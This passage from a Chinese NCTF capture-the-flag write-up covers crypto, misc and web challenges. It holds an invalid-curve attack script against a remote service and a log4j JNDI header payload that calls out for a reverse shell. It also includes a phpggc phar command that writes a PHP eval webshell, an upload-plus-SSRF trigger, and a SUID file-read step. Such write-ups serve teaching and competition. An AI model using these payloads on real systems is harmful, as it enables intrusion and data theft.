243*xq^180 + 13*xq^179 + 137*xq^178 + 428*xq^177 + 485*xq^176 + 100*xq^175 + 414*xq^174 + 81*xq^173 + 103*xq^172 + 185*xq^171 + 114*xq^170 + 248*xq^169 + 339*xq^168 + 491*xq^167 + 435*xq^166 + 286*xq^165 + 303*xq^164 + 7*xq^163 + 111*xq^162 + 450*xq^161 + 42*xq^160 + 214*xq^159 + 16*xq^158 + 151*xq^157 + 140*xq^156 + 32*xq^155 + 259*xq^154 + 192*xq^153 + 79*xq^152 + 45*xq^151 + 346*xq^150 + 159*xq^149 + 183*xq^148 + 247*xq^147 + 101*xq^146 + 167*xq^145 + 429*xq^144 + 466*xq^143 + 374*xq^142 + 184*xq^141 + 255*xq^140 + 449*xq^139 + 9*xq^138 + 468*xq^137 + 43*xq^136 + 460*xq^135 + 386*xq^134 + 101*xq^133 + 436*xq^132 + 139*xq^131 + 305*xq^130 + 57*xq^129 + 390*xq^128 + 341*xq^127 + 402*xq^126 + 129*xq^125 + 381*xq^124 + 378*xq^123 + 149*xq^122 + xq^121 + 88*xq^120 + 73*xq^119 + 306*xq^118 + 126*xq^117 + 475*xq^116 + 101*xq^115 + 375*xq^114 + 461*xq^113 + 101*xq^112 + 379*xq^111 + 336*xq^110 + 57*xq^109 + 376*xq^108 + 377*xq^107 + 286*xq^106 + 201*xq^105 + 227*xq^104 + 207*xq^103 + 212*xq^102 + 366*xq^101 + 125*xq^100 + 430*xq^99 + 33*xq^98 + 284*xq^97 + 288*xq^96 + 228*xq^95 + 305*xq^94 + 134*xq^93 + 468*xq^92 + 120*xq^91 + 322*xq^90 + 121*xq^89 + 319*xq^88 + 364*xq^87 + 366*xq^86 + 488*xq^85 + 13*xq^84 + 472*xq^83 + 82*xq^82 + 189*xq^81 + 415*xq^80 + 304*xq^79 + xq^78 + 190*xq^77 + 499*xq^76 + 13*xq^75 + 93*xq^74 + 154*xq^73 + 282*xq^72 + 193*xq^71 + 31*xq^70 + 437*xq^69 + 245*xq^68 + 424*xq^67 + 276*xq^66 + 200*xq^65 + 423*xq^64 + 422*xq^63 + 81*xq^62 + 34*xq^61 + 60*xq^60 + 405*xq^59 + 497*xq^58 + 127*xq^57 + 265*xq^56 + 401*xq^55 + 430*xq^54 + 374*xq^53 + 483*xq^52 + 133*xq^51 + 214*xq^50 + 85*xq^49 + 241*xq^48 + 13*xq^47 + 167*xq^46 + 279*xq^45 + 501*xq^44 + 261*xq^43 + 187*xq^42 + 80*xq^41 + 84*xq^40 + 458*xq^39 + 424*xq^38 + 155*xq^37 + 36*xq^36 + 360*xq^35 + 57*xq^34 + 381*xq^33 + 336*xq^32 + 261*xq^31 + 443*xq^30 + 378*xq^29 + 435*xq^28 + 271*xq^27 + 165*xq^26 + 126*xq^25 + 120*xq^24 + 263*xq^23 + 320*xq^22 + 318*xq^21 + 506*xq^20 + 372*xq^19 + 495*xq^18 + 380*xq^17 + 304*xq^16 + 467*xq^15 + 368*xq^14 + 52*xq^13 + 19*xq^12 + 373*xq^11 + 103*xq^10 + 506*xq^9 + 480*xq^8 + 223*xq^7 + 91*xq^6 + 464*xq^5 + 68*xq^4 + 115*xq^3 + 491*xq^2 + 149*xq + 219'
    ntru.setKey(fx, gx)
    m = ntru.decrypt(e)
    print('m=',m)
    print(m.list())
m= -x^508 - x^507 - x^506 - x^505 - x^504 - x^503 - x^502 - x^501 - x^500 - x^499 - x^498 - x^497 - x^496 - x^495 - x^494 - x^493 - x^492 - x^491 - x^490 - x^489 - x^488 - x^487 - x^486 - x^485 - x^484 - x^483 - x^482 - x^481 - x^480 - x^479 - x^478 - x^477 - x^476 - x^475 - x^474 - x^473 - x^472 - x^471 - x^470 - x^469 - x^468 - x^467 - x^466 - x^465 - x^464 - x^463 - x^462 - x^461 - x^460 - x^459 - x^458 - x^457 - x^456 - x^455 - x^454 - x^453 - x^452 - x^451 - x^450 - x^449 - x^448 - x^447 - x^446 - x^445 - x^444 - x^443 - x^442 - x^441 - x^440 - x^439 - x^438 - x^437 - x^436 - x^435 - x^434 - x^433 - x^432 - x^431 - x^430 - x^429 - x^428 - x^427 - x^426 - x^425 - x^424 - x^423 - x^422 - x^421 - x^420 - x^419 - x^418 - x^417 - x^416 - x^415 - x^414 - x^413 - x^412 - x^411 - x^410 - x^409 - x^408 - x^407 - x^406 - x^405 - x^404 - x^403 - x^402 - x^401 - x^400 - x^399 - x^398 - x^397 - x^396 - x^395 - x^394 - x^393 - x^392 - x^391 - x^390 - x^389 - x^388 - x^387 - x^386 - x^385 - x^384 - x^383 - x^382 - x^381 - x^380 - x^379 - x^378 - x^377 - x^376 - x^375 - x^374 - x^373 - x^372 - x^371 - x^370 - x^369 - x^368 - x^367 - x^366 - x^365 - x^364 - x^363 - x^362 - x^361 - x^360 - x^359 - x^358 - x^357 - x^356 - x^355 - x^354 - x^353 - x^352 - x^351 - x^350 - x^349 - x^348 - x^347 - x^346 - x^345 - x^344 - x^343 - x^342 - x^341 - x^340 - x^339 - x^338 - x^337 - x^336 + x^335 + x^333 + x^332 + x^331 + x^330 + x^329 + x^326 + x^323 + x^322 + x^319 + x^317 + x^315 + x^314 + x^310 + x^307 + x^306 + x^303 + x^301 + x^298 + x^297 + x^295 + x^292 + x^291 + x^290 + x^286 + x^282 + x^281 + x^275 + x^274 + x^270 + x^269 + x^267 + x^266 + x^262 + x^261 + x^258 + x^257 + x^255 + x^252 + x^251 + x^250 + x^247 + x^246 + x^243 + x^242 + x^238 + x^234 + x^233 + x^231 + x^229 + x^228 + x^226 + x^221 + x^218 + x^217 + x^215 + x^212 + x^211 + x^210 + x^207 + x^205 + x^203 + x^202 + x^199 + x^196 + x^195 + x^194 + x^191 + x^189 + x^188 + x^186 + x^183 + x^181 + x^178 + x^177 + x^175 + x^173 + x^170 + x^169 + x^167 + x^163 + x^162 + x^159 + x^155 + x^154 + x^151 + x^149 + x^148 + x^146 + x^143 + x^142 + x^138 + x^137 + x^134 + x^133 + x^131 + x^130 + x^123 + x^122 + x^119 + x^114 + x^113 + x^111 + x^109 + x^108 + x^106 + x^101 + x^99 + x^98 + x^92 + x^91 + x^90 + x^87 + x^86 + x^83 + x^82 + x^79 + x^75 + x^74 + x^67 + x^66 + x^63 + x^62 + x^59 + x^58 + x^55 + x^53 + x^50 + x^49 + x^43 + x^42 + x^39 + x^38 + x^36 + x^35 + x^34 + x^33 + x^30 + x^29 + x^25 + x^21 + x^19 + x^17 + x^15 + x^14 + x^9 + x^6 + x^5 + x^4 + x[0, 1, 0, 0, 1, 1, 1, 0, 0, 1, 0, 0, 0, 0, 1, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 0, 1, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0, 1, 0, 0, 0, 0, 1, 0, 1, 1, 0, 1, 0, 1, 1, 0, 0, 0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 1, 0, 1, 1, 0, 1, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1, 1, 0, 0, 1, 0, 1, 0, 1, 1, 0, 0, 1, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 0, 0, 1, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 1, 0, 1, 0, 0, 1, 1, 1, 0, 0, 1, 0, 1, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 1, 1, 0, 1, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 1, 0, 0, 1, 0, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 0, 1, 0, 1, 1, 0, 0, 1, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1]

图片

Code Infinite

无效曲线攻击

多次交互就恢复出参数

from Crypto.Util.number import *Ps = [(3347544427935793471773789572666938170616463693373113804469,5286206919937783916162967221186944599996261865138904860298),(4174816394281823310821103181911451347126995127453513345868,4323185381212691145799866982277156901998144220998688953915),(4794898368368395829524435876640991589487019612064355893323,6194487152983562538255708829062116506738488691008508433133),(53863762961520487576742124374974739819893208664926258932,4039312710297970036766365863510121065943474277623081951614)]PR.<a,b,c,d> = PolynomialRing(ZZ)fs = []for P in Ps: x,y = P f = x^3 + a*x + b - y^2 fs.append(f)I = Ideal(fs)res=I.groebner_basis()print(res)p=6277101735386680763835789423207666416083908700390324961279a=6277101735386680763835789423207666416083908700390324961276b=2455155546008943817740293915197451784769108058161191238065E=EllipticCurve(Zmod(p),[a,b])

找到一个基本原题的:

https://github.com/stellarvector/blog/blob/fc2889aaa22089286f32b909a817fe0f8627a873/_writeups/2023/lakectf/keysharer.md

本地参数没有修改,那就用脚本里的参数去跑,这里远程环境有点奔溃,感觉限制了时间,直接交互跑就超时不输出数据了,只能取出数据本地跑,通过脚本数据取出输出的数据


from sage.all import * 
from pwn import *
from random import randint
from tqdm import trange
import ast
import string
from hashlib import sha256
from itertools import product
from pwnlib.util.iters import mbruteforce
#context(log_level='debug',arch='amd64')
p=6277101735386680763835789423207666416083908700390324961279
a=6277101735386680763835789423207666416083908700390324961276
b=2455155546008943817740293915197451784769108058161191238065
# # revcive pub 
E = EllipticCurve(GF(p),[a,b])
r = remote("115.159.221.202",11112)
table = string.ascii_letters+string.digits

r.recvuntil(b"XXXX+")
suffix = r.recv(16).decode("utf8")
print('suffix=',suffix)
r.recvuntil(b"== ")
cipher = r.recvline().strip().decode("utf8")
print('cipher=',cipher)
proof = mbruteforce(lambda x: sha256((x + suffix).encode()).hexdigest()==cipher, table, length=4, method='fixed')
r.recvuntil(b'Plz tell me XXXX: ')
r.sendline(proof)
r.recvuntil(b'The secret is')
enc=r.recvuntil('\n',drop=True)
print(enc)
r.recvuntil(b"Alice's public key is ")
pub = ast.literal_eval(r.recvuntilS('\n'))
print(pub)
pp=[(1428777260646132976198331917216550410517338377336849911092,3658983833028448009741994042652306163657412286434111440479),(3189235510701084020240251273172260904256567493190538416973,3147050744360070584444363752093634124297717789231789390963),(1836055837552433451429707649431552069210777860779533915323,4080888809128014080938902461081426574934912634479355715692),(567148773685333711499991584170987837091585548967120385444,2945834156539179266918934145900085216962713232769658612995)]
for i in range (4):
    r.recvuntil("Give me your pub key's x : \n")
    r.sendline(str(pp[i][0]))
    r.recvuntil("Give me your pub key's y : \n")
    r.sendline(str(pp[i][1]))
    r.recvuntil('The shared key is\n')
    aa=r.recvuntil('\n')
    print(aa)
r.interactive()

 

sage@9a54ced73b2d:~$ sage 6.sage
Warning: _curses.error: setupterm: could not find terminfo database

Terminal features will not be available.  Consider setting TERM variable to your current terminal name (or xterm).
[x] Opening connection to 115.159.221.202 on port 11112
[x] Opening connection to 115.159.221.202 on port 11112: Trying 115.159.221.202
[+] Opening connection to 115.159.221.202 on port 11112: Done
[DEBUG] Received 0x7c bytes:
    b'[+] sha256(XXXX+h5mufP1mCgHzvNSF) == ec4050ea0565d593e85bdf86fe347e31f59a26024d022d9b0cc502612275d92e\n'
    b'[+] Plz tell me XXXX: '
suffix= h5mufP1mCgHzvNSF
cipher= ec4050ea0565d593e85bdf86fe347e31f59a26024d022d9b0cc502612275d92e
[x] MBruteforcing
[x] MBruteforcing: Trying "aNHI","aDiz","aoJm","" -- 0.722%
[x] MBruteforcing: Trying "c03Q","cKpB","cjmc","bYxT" -- 3.790%
[x] MBruteforcing: Trying "fckW","eJcv","eooc","d7JX" -- 7.174%
[x] MBruteforcing: Trying "hjrY","gFUn","f6wQ","f8BT" -- 10.314%
[x] MBruteforcing: Trying "jmoW","iwm9","hWZC","h3eJ" -- 13.400%
[x] MBruteforcing: Trying "kNTk","kkKT","jRCs","kiFT" -- 16.391%
[x] MBruteforcing: Trying "mOLg","mlCP","lSuo","mjxP" -- 19.640%
[x] MBruteforcing: Trying "oHi4","okpJ","n1Gs","okpL" -- 22.874%
[x] MBruteforcing: Trying "qWKe","qrwL","pR9e","p8Nv" -- 26.123%
[x] MBruteforcing: Trying "soeC","ssoH","r5vm","sbKt" -- 29.222%
[+] MBruteforcing: Found key: "sqgO"
[DEBUG] Sent 0x5 bytes:
    b'sqgO\n'
[DEBUG] Received 0x160 bytes:
    b'\n'
    b'=============================================\n'
    b'The secret is 0c698cd088a5b5b3056b5fe493fd5540eebeacb63766aa11b55d2624a1b40f22a2bb8dfde77f8bed82ef3b754ab517ba \n'
    b"Alice's public key is (2051359988032026871077360333883735474620825242314130189557,4767285956448164983464063965004900916104853251848743185636)\n"
    b'Now send over yours !\n'
    b'\n'
    b"Give me your pub key's x : \n"
  enc=r.recvuntil('\n',drop=True)
b' 0c698cd088a5b5b3056b5fe493fd5540eebeacb63766aa11b55d2624a1b40f22a2bb8dfde77f8bed82ef3b754ab517ba '
(2051359988032026871077360333883735474620825242314130189557, 4767285956448164983464063965004900916104853251848743185636)
  r.recvuntil("Give me your pub key's x : \n")
[DEBUG] Sent 0x3b bytes:
    b'1428777260646132976198331917216550410517338377336849911092\n'
  r.recvuntil("Give me your pub key's y : \n")
[DEBUG] Received 0x1c bytes:
    b"Give me your pub key's y : \n"
[DEBUG] Sent 0x3b bytes:
    b'3658983833028448009741994042652306163657412286434111440479\n'
  r.recvuntil('The shared key is\n')
[DEBUG] Received 0xa7 bytes:
    b'The shared key is\n'
    b' (3084271333066713828057038378439279150538717658756205609200,1310282009516155977017057215827949690347164169057572537408)\n'
    b"Give me your pub key's x : \n"
b' (3084271333066713828057038378439279150538717658756205609200,1310282009516155977017057215827949690347164169057572537408)\n'
[DEBUG] Sent 0x3b bytes:
    b'3189235510701084020240251273172260904256567493190538416973\n'
[DEBUG] Received 0x1c bytes:
    b"Give me your pub key's y : \n"
[DEBUG] Sent 0x3b bytes:
    b'3147050744360070584444363752093634124297717789231789390963\n'
[DEBUG] Received 0xa7 bytes:
    b'The shared key is\n'
    b' (5604808263595846445971026075008584858390434890801737820279,2274847551606407770962152211502512185234293936818118774553)\n'
    b"Give me your pub key's x : \n"
b' (5604808263595846445971026075008584858390434890801737820279,2274847551606407770962152211502512185234293936818118774553)\n'
[DEBUG] Sent 0x3b bytes:
    b'1836055837552433451429707649431552069210777860779533915323\n'
[DEBUG] Received 0x1c bytes:
    b"Give me your pub key's y : \n"
[DEBUG] Sent 0x3b bytes:
    b'4080888809128014080938902461081426574934912634479355715692\n'
[DEBUG] Received 0xa6 bytes:
    b'The shared key is\n'
    b' (427133967074065121217736192274119695420764300677914144511,1529029868640975079407700705958377227076310032496158479674)\n'
    b"Give me your pub key's x : \n"
b' (427133967074065121217736192274119695420764300677914144511,1529029868640975079407700705958377227076310032496158479674)\n'
[DEBUG] Sent 0x3a bytes:
    b'567148773685333711499991584170987837091585548967120385444\n'
[DEBUG] Received 0x1c bytes:
    b"Give me your pub key's y : \n"
[DEBUG] Sent 0x3b bytes:
    b'2945834156539179266918934145900085216962713232769658612995\n'
[DEBUG] Received 0x8b bytes:
    b'The shared key is\n'
    b' (4169648277589046124661741436659237344585347147625456293714,1259411937729092347601009020473515290395717375901870254648)\n'
b' (4169648277589046124661741436659237344585347147625456293714,1259411937729092347601009020473515290395717375901870254648)\n'
[*] Switching to interactive mode
[*] Got EOF while reading in interactive

把出来的数据放到脚本里跑


from time import time

def get_invalid_point(p, a, known_factors = [], check_point = False):
  """
  Input: the prime p, the fixed curve parameter a, and the already know factors
    that we do not want to repeat. Optionally we can check how much does it take
    to solve the dlp for a point before returning it with check_point=True.
  Output: an invalid point Q, the parameter b defining its curve, and the factors
    of its order.
  """
  while True:
    b = randint(1, p)
    E_1 = EllipticCurve(GF(p), [a, b])
    order = E_1.order()
    factors = prime_factors(order)

    # Compute the best order we can get from a point
    good_factors = []
    for f in factors:
      if f.nbits() <= 40 and not f in known_factors:
        good_factors.append(f)

    cof = prod(good_factors)
    if cof.nbits() >= 50:
      print(f'Found curve')
      break

  # Now that we have a good curve, we need to find the point
  G = E_1.gen(0) * (order // cof)
  assert G.order() == cof

  if check_point:
    # Sanity check that we can actually solve the invalid dlp
    r = randint(1, cof)
    Q = G*r

    print(f'Solving dlog for {cof.nbits()} bits order')
    tic = time()
    dlog = G.discrete_log(Q)
    assert dlog == r, (r, dlog)
    print(f'Done in {round(time() - tic, 2)} s')

  return G, b, good_factors



if __name__ == '__main__':
  p = 0xfffffffffffffffffffffffffffffffeffffffffffffffff
  a = 0xfffffffffffffffffffffffffffffffefffffffffffffffc
  b = 0x64210519e59c80e70fa7e9ab72243049feb8deecc146b9b1

  E = EllipticCurve(GF(p), [a, b])
  order = E.order()
  assert is_prime(order) # should we trust NSA? 

  known_factors = []
  Gs = []
  Bs = []
  for i in range(4):
    G, b, new_factors = get_invalid_point(p, a, known_factors)
    known_factors.extend(new_factors)
    print(f'{G = }\n{b = }')
    print(f'Got {prod(known_factors).nbits()} total bits')

  # Some computed values
  p = 0xfffffffffffffffffffffffffffffffeffffffffffffffff
  a = 0xfffffffffffffffffffffffffffffffefffffffffffffffc
  b = 0x64210519e59c80e70fa7e9ab72243049feb8deecc146b9b1

  Bs = [83741891083651463213018945835494413320520449989597215648,3556206473404317281093691979083778944572588872003627559970,132627736693468008571263914981090018160610438249416432561,4353766386870675869823517562355728918310218671450488829638]
  Gs = [EllipticCurve(GF(p), [a, Bs[0]])(1428777260646132976198331917216550410517338377336849911092, 3658983833028448009741994042652306163657412286434111440479),EllipticCurve(GF(p), [a, Bs[1]])(3189235510701084020240251273172260904256567493190538416973, 3147050744360070584444363752093634124297717789231789390963),EllipticCurve(GF(p), [a, Bs[2]])(1836055837552433451429707649431552069210777860779533915323, 4080888809128014080938902461081426574934912634479355715692),EllipticCurve(GF(p), [a, Bs[3]])(567148773685333711499991584170987837091585548967120385444, 2945834156539179266918934145900085216962713232769658612995)]

  # Server values
  pub = EllipticCurve(GF(p), [a, b])(275956366273838645914286744108317970424389601350215013292,1715484665561054570396524612468150066010506001507851259697)
  out = [
    EllipticCurve(GF(p), [a, Bs[0]])(3084271333066713828057038378439279150538717658756205609200,1310282009516155977017057215827949690347164169057572537408),
    EllipticCurve(GF(p), [a, Bs[1]])(5604808263595846445971026075008584858390434890801737820279,2274847551606407770962152211502512185234293936818118774553),
    EllipticCurve(GF(p), [a, Bs[2]])(427133967074065121217736192274119695420764300677914144511,1529029868640975079407700705958377227076310032496158479674),
    EllipticCurve(GF(p), [a, Bs[3]])(4169648277589046124661741436659237344585347147625456293714,1259411937729092347601009020473515290395717375901870254648)
  ]

  orders = [Gs[i].order() for i in range(4)]
  dlogs = []
  for i in range(4):
    print(f'Solving dlog {i}')
    dlog = Gs[i].discrete_log(out[i])
    print(f'{dlog = }')
    dlogs.append(dlog)

  PK = CRT_list(dlogs, orders)

  print('PK=',PK)
#   G = d*pub
#   flag = int(G[0]).to_bytes((int(G[0]).bit_length() + 7)//8, 'big')
#   print(f'{flag = }')
from gmpy2 import *from Crypto.Util.number import *from Crypto.Cipher import AESPK=4936187294129309593476214586052136834243677721083846173777key = long_to_bytes(PK)[:16]enc='0c698cd088a5b5b3056b5fe493fd5540eebeacb63766aa11b55d2624a1b40f22a2bb8dfde77f8bed82ef3b754ab517ba'enc=bytes.fromhex(enc)print(enc)Cipher = AES.new(key,AES.MODE_ECB)flag = Cipher.decrypt(enc)print(flag)
b'\x0ci\x8c\xd0\x88\xa5\xb5\xb3\x05k_\xe4\x93\xfdU@\xee\xbe\xac\xb67f\xaa\x11\xb5]&$\xa1\xb4\x0f"\xa2\xbb\x8d\xfd\xe7\x7f\x8b\xed\x82\xef;uJ\xb5\x17\xba'
b'NCTF{ca93509d-9ecf-11ee-9b92-b025aa41becb}\x00\x00\x00\x00\x00\x00'

MISC

Jump For Flag

跟Jump For Signin题目类似,猜测也是一个二维码,不过只会掉落部分方块,猜测用到了Random函数,随机掉落部分方块

于是用dnSpy同时反编译Jump For Flag和Jump For Signin的Assembly-CSharp.dll文件,再分别将每个函数进行对比,看对哪里做了手脚,最终在此处发现不同

图片

图片

将Jump For Signin此处的代码复制到Jump For Flag中

重新编辑类,编译会发现报错

图片

将private float groundDistance = 0.1f;删掉

将Object改为UnityEngine.Object

再次编译即可成功,最后保存,重新打开游戏

跳一下即可获得二维码

图片

扫一下得到flag:NCTF{25d8fdeb-0cb6-4ad4-8da1-788a72e701f0}

NCTF2077 jackpot

直接解邮件内容,一个exe一个png

图片

exe反编译不了直接爆搜flag,拿到后半段flag

图片

png发现后四个通道有异常

图片

图片

图片

图片

很容易想到Invoke-PSImage项目,解密脚本:

https://xz.aliyun.com/t/13159

from PIL import Image

def solove_png(image_path):
    img = Image.open(image_path)
    width, height = img.size
    extract_data = bytearray()
    for y in range(height):
        for x in range(width):
            pixels = img.getpixel((x, y))

            extract_byte = (pixels[1] & 0x0F) | ((pixels[2] & 0x0F) << 4)

            extract_data.append(extract_byte)

    return extract_data

image_path = "nctf.png"
data = solove_png(image_path)

with open('1.bin', 'wb') as f:
    f.write(data)

得到

图片

后面就是简单的解混淆了没什么多可说的

就最后一步有一个powershell SecureString加密

 .( ([STRINg]$VeRbOSEPrefEReNcE)[1,3]+'X'-jOIN'') ( ([rUNtiME.INTERoPsERvIceS.MaRshal]::PTRtOstrinGBsTr([runtIme.INTeRopSeRviCES.mARShAl]::seCUResTrInGTObsTR( $('
 …………
 ' | conVeRtto-SEcurEsTrIng -key  (143..112)) ) ) ) )

让gpt嗦个脚本

# 指定加密字符串文件的路径$encryptedStringPath = "C:\Users\22826\Desktop\download.dat"
# 读取加密字符串$encryptedString = Get-Content -Path $encryptedStringPath
# 定义用于解密的密钥$key = 143..112
# 将加密的字符串转换为安全字符串$secureString = ConvertTo-SecureString -String $encryptedString -Key $key
# 转换安全字符串为普通文本$ptr = [Runtime.InteropServices.Marshal]::SecureStringToBSTR($secureString)$decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR($ptr)[Runtime.InteropServices.Marshal]::ZeroFreeBSTR($ptr)
# 输出解密后的字符串Write-Host "Decrypted String: $decryptedString"

运行拿到前半段flag

图片

 

拼接

NCTF{5945cf0b-fdd6-4b7b-873e-12a9595bbce8}

WEB

Logging

根据hint,fuzz出Accept头存在log4j的漏洞


GET / HTTP/1.1
Host: 124.71.184.68:8011
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8${jndi:ldap://ip:port/Basic/ReverseShell/ip/port}
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: aiovg_rand_seed=1362609461
Upgrade-Insecure-Requests: 1

然后jndiexploit就可以拿下了

Wordpress

通过wpscan扫描


[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.54 (Debian)
 |  - X-Powered-By: PHP/7.4.33
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://124.71.184.68:8012/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://124.71.184.68:8012/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://124.71.184.68:8012/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.4.1 identified (Insecure, released on 2023-11-09).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://124.71.184.68:8012/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=6.4.1'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://124.71.184.68:8012/, Match: 'WordPress 6.4.1'

[+] WordPress theme in use: twentytwentyfour
 | Location: http://124.71.184.68:8012/wp-content/themes/twentytwentyfour/
 | Readme: http://124.71.184.68:8012/wp-content/themes/twentytwentyfour/readme.txt
 | Style URL: http://124.71.184.68:8012/wp-content/themes/twentytwentyfour/style.css
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | The version could not be determined.

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] all-in-one-video-gallery
 | Location: http://124.71.184.68:8012/wp-content/plugins/all-in-one-video-gallery/
 | Last Updated: 2023-09-01T08:47:00.000Z
 | [!] The version is out of date, the latest version is 3.5.2
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 2.6.0 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://124.71.184.68:8012/wp-content/plugins/all-in-one-video-gallery/README.txt

[+] contact-form-7
 | Location: http://124.71.184.68:8012/wp-content/plugins/contact-form-7/
 | Last Updated: 2023-12-19T04:49:00.000Z
 | [!] The version is out of date, the latest version is 5.8.5
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 5.8.4 (90% confidence)
 | Found By: Query Parameter (Passive Detection)
 |  - http://124.71.184.68:8012/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.8.4
 | Confirmed By: Readme - Stable Tag (Aggressive Detection)
 |  - http://124.71.184.68:8012/wp-content/plugins/contact-form-7/readme.txt

[+] drag-and-drop-multiple-file-upload-contact-form-7
 | Location: http://124.71.184.68:8012/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/
 | Last Updated: 2023-12-05T07:37:00.000Z
 | [!] The version is out of date, the latest version is 1.3.7.4
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.3.6.2 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://124.71.184.68:8012/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:02 <=> (137 / 137) 100.00% Time: 00:00:02

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

得知


wordpress 6.4 存在rce的gadget
all-in-one-video-gallery 搜索可以知道存在ssrf
drag-and-drop-multiple-file-upload-contact-form-7 可以上传文件

很显而易见

上传存在gadget的phar文件,然后通过ssrf打phar

通过phpggc生成phar文件 

./phpggc WordPress/RCE2 system "echo PD9waHAgZXZhbCgkX1BPU1RbJ2EnXSk7|base64 -d > a.php" -p phar -o a.png

接着上传文件


import requests
url = "http://120.27.148.152:8012//wp-admin/admin-ajax.php"

data = {
    "supported_type":"png",
    "size_limit":"5242880",
    "action":"dnd_codedropz_upload",
    "type":"click",
    "security":"b738e27dac"
}
r = requests.post(url,data=data,files={'upload-file':('logo.png',open('/Users/kaikaix/Desktop/audit/phpggc/a.png','rb'))}
                  )
print(r.content)

然后触发phar

http://120.27.148.152:8012/index.php/video/?dl=cGhhcjovLy92YXIvd3d3L2h0bWwvd3AtY29udGVudC91cGxvYWRzL3dwX2RuZGNmN191cGxvYWRzL3dwY2Y3LWZpbGVzL2xvZ28ucG5nL3Rlc3QudHh0

然后访问a.php 发现访问不到,猜测是伪路由的原因,再生成一个phar链子,把.htaccess删掉就行了 连接蚁剑,suid提权

find / -perm -u=s -type f 2>/dev/nulldate -f /flag

checkin

图片

首先对写入的字符进行过滤,a-z,A-Z,0-9。

使用ae64工具进行shellcode生成。

图片

